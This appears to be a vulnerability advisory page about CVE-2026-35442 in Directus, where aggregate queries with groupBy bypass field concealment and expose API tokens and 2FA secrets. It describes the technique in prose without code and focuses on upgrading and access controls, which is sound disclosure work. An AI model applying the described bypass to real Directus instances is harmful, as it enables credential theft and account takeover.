Platform
nodejs
Component
directus
Fixed in
11.17.1
11.17.0
CVE-2026-35442 describes an information disclosure vulnerability in Directus. This flaw allows authenticated users with read access to collections to extract concealed field values, potentially exposing sensitive data. The vulnerability affects versions prior to 11.17.0. A fix has been released in version 11.17.0.
The primary impact of CVE-2026-35442 is the unauthorized disclosure of sensitive information. Specifically, attackers can leverage aggregate functions (min, max) on fields marked with the conceal special type to bypass the intended masking mechanism. This allows them to retrieve raw database values, including static API tokens and two-factor authentication secrets stored within the directus_users table. Successful exploitation could lead to account takeover, unauthorized access to data, and potential compromise of the entire Directus instance. The groupBy functionality exacerbates the risk, enabling attackers to efficiently extract multiple concealed values.
CVE-2026-35442 was publicly disclosed on 2026-04-04. There is currently no indication of active exploitation in the wild. The vulnerability's impact is significant due to the potential for data exfiltration and account compromise, but the requirement for authenticated access limits its immediate exploitability. No public proof-of-concept (PoC) code has been released as of this writing.
Exploit Status
EPSS
0.04% (11% percentile)
CISA SSVC
CVSS Vector
The recommended mitigation for CVE-2026-35442 is to immediately upgrade Directus to version 11.17.0 or later. If upgrading is not immediately feasible, consider restricting read access to collections containing concealed fields to only authorized users. While not a complete solution, implementing stricter access controls can limit the potential impact. Review and audit existing Directus configurations to identify any instances where concealed fields are being used inappropriately. After upgrading, confirm the fix by attempting to query concealed fields using aggregate functions and verifying that the masked placeholder values are returned as expected.
Update Directus to version 11.17.0 or higher to fix the vulnerability. This update corrects the improper handling of concealed fields in aggregate queries, preventing the extraction of sensitive information by authenticated users.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2026-35442 is a HIGH severity vulnerability in Directus versions before 11.17.0 where aggregate functions expose concealed field values, allowing authenticated users to extract sensitive data like API tokens and 2FA secrets.
You are affected if you are running Directus versions prior to 11.17.0 and use concealed fields to protect sensitive data. Upgrade immediately to mitigate the risk.
Upgrade Directus to version 11.17.0 or later. If immediate upgrade is not possible, restrict read access to collections containing concealed fields.
There is currently no indication of active exploitation in the wild, but the vulnerability's impact warrants immediate attention and remediation.
Refer to the official Directus security advisory on their website for detailed information and updates regarding CVE-2026-35442.
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.